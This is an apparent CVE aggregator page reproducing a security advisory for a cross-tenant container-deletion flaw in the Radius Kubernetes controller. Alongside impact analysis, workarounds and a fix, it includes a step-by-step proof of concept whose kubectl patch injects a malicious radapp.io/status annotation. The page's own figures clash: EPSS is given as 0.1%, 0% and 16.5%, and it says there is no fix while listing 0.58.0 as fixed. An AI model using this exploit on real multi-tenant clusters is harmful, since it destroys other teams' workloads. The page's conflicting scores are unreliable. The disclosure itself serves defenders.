CVE-2026-53999

HIGHPre-NVD 7.77.7
EchelonGraph scoreLOW confidence

This high-severity CVE scores 7.7 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit probability: 0.1%, top 84% of all CVEs by exploit prediction. GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m, epss
7.7
EchelonGraph verdictPlan a fixSerious severity, but no confirmed exploitation yet.
  • High severity, but no confirmed exploitation yet
CISA-KEV: Not listedEPSS: 0%CVSS: 7.7Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

Radius Controller May Delete a Container Resource via an Injected Deployment Annotation (Multi-Tenant Installs)

Radius Controller May Delete a Container Resource via an Injected Deployment Annotation (Multi-Tenant Installs)

Summary

A configuration-validation issue in the Radius Kubernetes controller can cause it to issue a DELETE for the container resource referenced by a tampered radapp.io/status annotation on a Deployment. It follows the "Confused Deputy" pattern. Real-world impact is bounded and depends heavily on install topology: in a multi-tenant install (one controller reconciling Deployments across resource groups owned by different teams) it can affect another team's container, while in a single-tenant install it is only self-DoS. There is no data disclosure, no privilege escalation, and no persistence, and deleted resources are recoverable through standard Radius deployment workflows.

  • Vulnerability Type: Configuration Injection / Cross-Tenant Resource Deletion
  • CVSS 3.1 Score: 7.7 (High in worst-case multi-tenant installs; Medium or lower in single-tenant or strict-RBAC installs)
  • CWE Classification: CWE-20 (Improper Input Validation), CWE-441 (Unintended Proxy or Intermediary)
  • Affected Versions: Radius v0.57.1 and earlier versions

Vulnerability Details

Root Cause

The Radius controller deserializes user-controllable JSON data from the radapp.io/status annotation on Kubernetes Deployments without validating whether the resource IDs belong to the current tenant. When the controller performs delete operations, it uses its own high-privilege credentials to send requests to the Radius API, enabling deletion of resources belonging to any tenant.

Vulnerable Code Locations

Vulnerability Source - pkg/controller/reconciler/annotations.go:110-119:

s := deploymentStatus{}
status := deployment.Annotations[AnnotationRadiusStatus]
if status != "" {
    err := json.Unmarshal([]byte(status), &s)  // Deserializes user-controllable data without validation
    if err != nil {
        return result, fmt.Errorf("failed to unmarshal status annotation: %w", err)
    }
    result.Status = &s
}

Vulnerability Sink - pkg/controller/reconciler/deployment_reconciler.go:491:

poller, err := deleteContainer(ctx, r.Radius, annotations.Status.Container)  // Directly uses user-controllable data for deletion

Attack Chain

┌─────────────────────────────────────────────────────────────────────────────┐
│                           Confused Deputy Attack                            │
├─────────────────────────────────────────────────────────────────────────────┤
│                                                                             │
│  Tenant-A (Attacker)                    Tenant-B (Victim)                   │
│  ┌──────────────────┐                   ┌──────────────────┐                │
│  │ legitimate-app   │                   │ victim-container │                │
│  │ (Deployment)     │                   │ (Radius Resource)│                │
│  └────────┬─────────┘                   └────────▲─────────┘                │
│           │                                      │                          │
│           │ 1. Inject malicious                  │ 4. DELETE request        │
│           │    radapp.io/status                  │    (no auth check!)      │
│           │    annotation                        │                          │
│           ▼                                      │                          │
│  ┌──────────────────┐                    ┌───────┴──────────┐               │
│  │ Radius Controller│ ─────────────────▶│   Radius API      │               │
│  │ (High Privilege) │  3. Uses injected  │   (UCP)          │               │
│  └──────────────────┘     container ID   └──────────────────┘               │
│           ▲                                                                 │
│           │ 2. Reads annotation                                             │
│           │    without validation                                           │
│           │                                                                 │
└───────────┴─────────────────────────────────────────────────────────────────┘

Proof of Concept (PoC)

Prerequisites

  • Kubernetes cluster with Radius v0.54.0 installed
  • Attacker has permission to modify Deployment annotations in a namespace
  • Target tenant has Radius-managed container resources

Environment Setup

Step 1: Install Kind Cluster and Radius

# Create Kind cluster
kind create cluster --name radius-test --image kindest/node:v1.27.3

Install Radius

rad install kubernetes --set global.zipkin.url=http://jaeger-collector.radius-system.svc.cluster.local:9411/api/v2/spans

Verify installation

kubectl get pods -n radius-system

Expected output:

NAME                            READY   STATUS    RESTARTS   AGE
applications-rp-xxx             1/1     Running   0          2m
bicep-de-xxx                    1/1     Running   0          2m
controller-xxx                  1/1     Running   0          2m
ucp-xxx                         1/1     Running   0          2m

Step 2: Create Attacker Tenant (tenant-a)

# Create resource group
rad group create tenant-a

Create environment

rad env create tenant-a-env --group tenant-a

Switch to tenant-a

rad group switch tenant-a rad env switch tenant-a-env

Step 3: Deploy Legitimate Application in tenant-a

Create legitimate-app.bicep:

extension radius

@description('The Radius application resource') resource app 'Applications.Core/applications@2023-10-01-preview' = { name: 'legitimate-app' properties: { environment: environment() } }

@description('The container resource') resource container 'Applications.Core/containers@2023-10-01-preview' = { name: 'legitimate-container' properties: { application: app.id container: { image: 'nginx:latest' } } }

Deploy the application:

rad deploy legitimate-app.bicep

Step 4: Create Victim Tenant (tenant-b)

# Create resource group and environment
rad group create tenant-b
rad env create tenant-b-env --group tenant-b

Create victim application and container via UCP API

kubectl port-forward svc/ucp -n radius-system 8443:443 & PF_PID=$! sleep 3

Create application

curl -k -X PUT "https://localhost:8443/apis/api.ucp.dev/v1alpha3/planes/radius/local/resourceGroups/tenant-b/providers/Applications.Core/applications/victim-app?api-version=2023-10-01-preview" \ -H "Content-Type: application/json" \ -d '{ "location": "global", "properties": { "environment": "/planes/radius/local/resourceGroups/tenant-b/providers/Applications.Core/environments/tenant-b-env" } }'

Create container

curl -k -X PUT "https://localhost:8443/apis/api.ucp.dev/v1alpha3/planes/radius/local/resourceGroups/tenant-b/providers/Applications.Core/containers/victim-container?api-version=2023-10-01-preview" \ -H "Content-Type: application/json" \ -d '{ "location": "global", "properties": { "application": "/planes/radius/local/resourceGroups/tenant-b/providers/Applications.Core/applications/victim-app", "container": { "image": "nginx:latest" } } }'

kill $PF_PID 2>/dev/null || true

Step 5: Verify Victim Resource Exists

kubectl get deployment -n tenant-b-victim-app victim-container

Expected output:

NAME               READY   UP-TO-DATE   AVAILABLE   AGE
victim-container   1/1     1            1           50s

Exploitation

Step 6: Inject Malicious Annotation

Create attack-patch.yaml:

metadata:
  annotations:
    radapp.io/enabled: "false"
    radapp.io/status: '{"container":"/planes/radius/local/resourceGroups/tenant-b/providers/Applications.Core/containers/victim-container","scope":"/planes/radius/local/resourceGroups/tenant-b"}'

Execute the attack:

kubectl patch deployment legitimate-app -n tenant-a --patch-file attack-patch.yaml

Expected output:

deployment.apps/legitimate-app patched

Step 7: Verify Attack Success

Wait a few seconds and check the victim's resources:

kubectl get all -n tenant-b-victim-app

Expected output:

No resources found in tenant-b-victim-app namespace.

Log Evidence

The controller logs show the cross-tenant deletion operation:

Attack Triggered (15:29:41.351Z):

{
  "timestamp": "2026-02-01T15:29:41.351Z",
  "message": "Starting DELETE operation.",
  "Deployment": {"name": "legitimate-app", "namespace": "tenant-a"}
}

Cross-Tenant Delete Request (15:29:41.351Z):

{
  "timestamp": "2026-02-01T15:29:41.351Z",
  "message": "Deleting container.",
  "scope": "/planes/radius/local/resourceGroups/tenant-b",
  "resourceType": "Applications.Core/containers"
}

Deletion Successful (15:29:41.367Z):

{
  "timestamp": "2026-02-01T15:29:41.367Z",
  "message": "Resource is deleted.",
  "Deployment": {"name": "legitimate-app", "namespace": "tenant-a"}
}

Impact

Security Impact

  • Confidentiality: No direct impact (no data disclosure)
  • Integrity: None - No victim data is modified; the issue deletes a Radius-managed container resource, which is recoverable from IaC
  • Availability: High - Can cause service disruption for target tenants

Attack Prerequisites

  • Attacker needs permission to modify Deployment annotations in a Kubernetes namespace
  • Attacker needs to know the target resource's Radius resource ID (obtainable through enumeration or social engineering)

CVSS 3.1 Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H

| Metric | Value | Description | |---------------------|---------|--------------------------------------------------------------------| | Attack Vector | Network | Via Kubernetes API | | Attack Complexity | Low | Only requires annotation modification | | Privileges Required | Low | Requires Deployment edit permission | | User Interaction | None | No user interaction required | | Scope | Changed | Affects other tenants | | Confidentiality | None | No data disclosure | | Integrity | None | No victim data modified; deletes a recoverable management resource | | Availability | High | Causes service disruption |

Workarounds

Until an official fix is released, consider the following mitigations:

  • Restrict Annotation Modification Permissions: Use Kubernetes RBAC to limit who can modify Deployment annotations
  • Monitor Anomalous Operations: Monitor modifications to radapp.io/status annotations, especially those containing other tenants' resource IDs
  • Network Isolation: Implement strict network policies in multi-tenant environments

Remediation Recommendations

Short-term Fix

Add validation logic in annotations.go to ensure the container ID in radapp.io/status belongs to the current namespace/tenant:

func validateContainerScope(deployment *appsv1.Deployment, containerID string) error {
    expectedScope := extractScopeFromDeployment(deployment)
    actualScope := extractScopeFromContainerID(containerID)
    if expectedScope != actualScope {
        return fmt.Errorf("container scope mismatch: expected %s, got %s", expectedScope, actualScope)
    }
    return nil
}

Long-term Fix

  • Implement Least Privilege Principle: The controller should use credentials associated with the Deployment's tenant
  • Add Radius API Authorization Validation: UCP should validate the source tenant of delete requests
  • Audit Logging: Log all cross-tenant operation attempts

References

CVSS v3
7.7
EG Score
7.7(low)
EPSS
16.5%
KEV
Not listed

Published

June 12, 2026

Last Modified

June 12, 2026

Vendor Advisories for CVE-2026-53999(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Affected Packages

(1 across 1 ecosystem)
Go(1)
PackageVulnerable rangeFixed inDependents
github.com/radius-project/radius0.58.0

Data Freshness Timeline

(refreshed 12× in last 7d / 46× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-07 01:00 UTCEG score recompute
  2. 2026-07-06 02:04 UTCEG score recompute
  3. 2026-07-05 13:02 UTCEG score recompute
  4. 2026-07-04 23:50 UTCEG score recompute
  5. 2026-07-04 10:50 UTCEG score recompute
  6. 2026-07-03 14:32 UTCEG score recompute
  7. 2026-07-03 01:25 UTCEG score recompute
  8. 2026-07-02 12:24 UTCEG score recompute
  9. 2026-07-01 23:22 UTCEG score recompute
  10. 2026-07-01 10:22 UTCEG score recompute
  11. 2026-06-30 21:22 UTCEG score recompute
  12. 2026-06-30 08:12 UTCEG score recompute
  13. 2026-06-29 19:12 UTCEG score recompute
  14. 2026-06-29 06:12 UTCEG score recompute
  15. 2026-06-28 16:50 UTCEG score recompute
  16. 2026-06-28 03:50 UTCEG score recompute
  17. 2026-06-27 14:50 UTCEG score recompute
  18. 2026-06-27 01:49 UTCEG score recompute
  19. 2026-06-26 12:49 UTCEG score recompute
  20. 2026-06-25 23:49 UTCEG score recompute
  21. 2026-06-25 10:50 UTCEG score recompute
  22. 2026-06-24 21:49 UTCEG score recompute
  23. 2026-06-24 08:50 UTCEG score recompute
  24. 2026-06-23 19:50 UTCEG score recompute
  25. 2026-06-23 06:50 UTCEG score recompute
Show 21 more
  1. 2026-06-22 17:29 UTCEG score recompute
  2. 2026-06-22 03:50 UTCEG score recompute
  3. 2026-06-21 14:08 UTCEG score recompute
  4. 2026-06-21 00:21 UTCEG score recompute
  5. 2026-06-20 11:18 UTCEG score recompute
  6. 2026-06-19 22:18 UTCEG score recompute
  7. 2026-06-19 09:15 UTCEG score recompute
  8. 2026-06-18 20:03 UTCEG score recompute
  9. 2026-06-18 06:58 UTCEG score recompute
  10. 2026-06-17 17:12 UTCEG score recompute
  11. 2026-06-17 04:12 UTCEG score recompute
  12. 2026-06-16 15:13 UTCEG score recompute
  13. 2026-06-16 02:12 UTCEG score recompute
  14. 2026-06-15 13:11 UTCEG score recompute
  15. 2026-06-15 00:11 UTCEG score recompute
  16. 2026-06-14 23:18 UTCEPSS rescore
  17. 2026-06-14 11:11 UTCEG score recompute
  18. 2026-06-13 23:00 UTCEPSS rescore
  19. 2026-06-13 22:11 UTCEG score recompute
  20. 2026-06-13 09:11 UTCEG score recompute
  21. 2026-06-12 20:11 UTCEG score recompute

Frequently asked(5)

What is CVE-2026-53999?
CVE-2026-53999 is a high vulnerability published on June 12, 2026. Radius Controller May Delete a Container Resource via an Injected Deployment Annotation (Multi-Tenant Installs) Radius Controller May Delete a Container Resource via an Injected Deployment Annotation (Multi-Tenant Installs) Summary A configuration-validation issue in the Radius Kubernetes…
When was CVE-2026-53999 disclosed?
CVE-2026-53999 was first published in the National Vulnerability Database on June 12, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
Is CVE-2026-53999 actively exploited?
CVE-2026-53999 is not currently on CISA's Known Exploited Vulnerabilities catalog. FIRST EPSS estimates a 16.5% percentile likelihood of exploitation in the next 30 days — higher percentiles indicate greater predicted risk.
What is the CVSS score of CVE-2026-53999?
CVE-2026-53999 has a CVSS v4.0 base score of 7.7 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-53999?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-53999, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

See which npm, PyPI, Go, and Maven packages are affected by CVE-2026-53999

Explore →

Is Your Infrastructure Affected by CVE-2026-53999?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.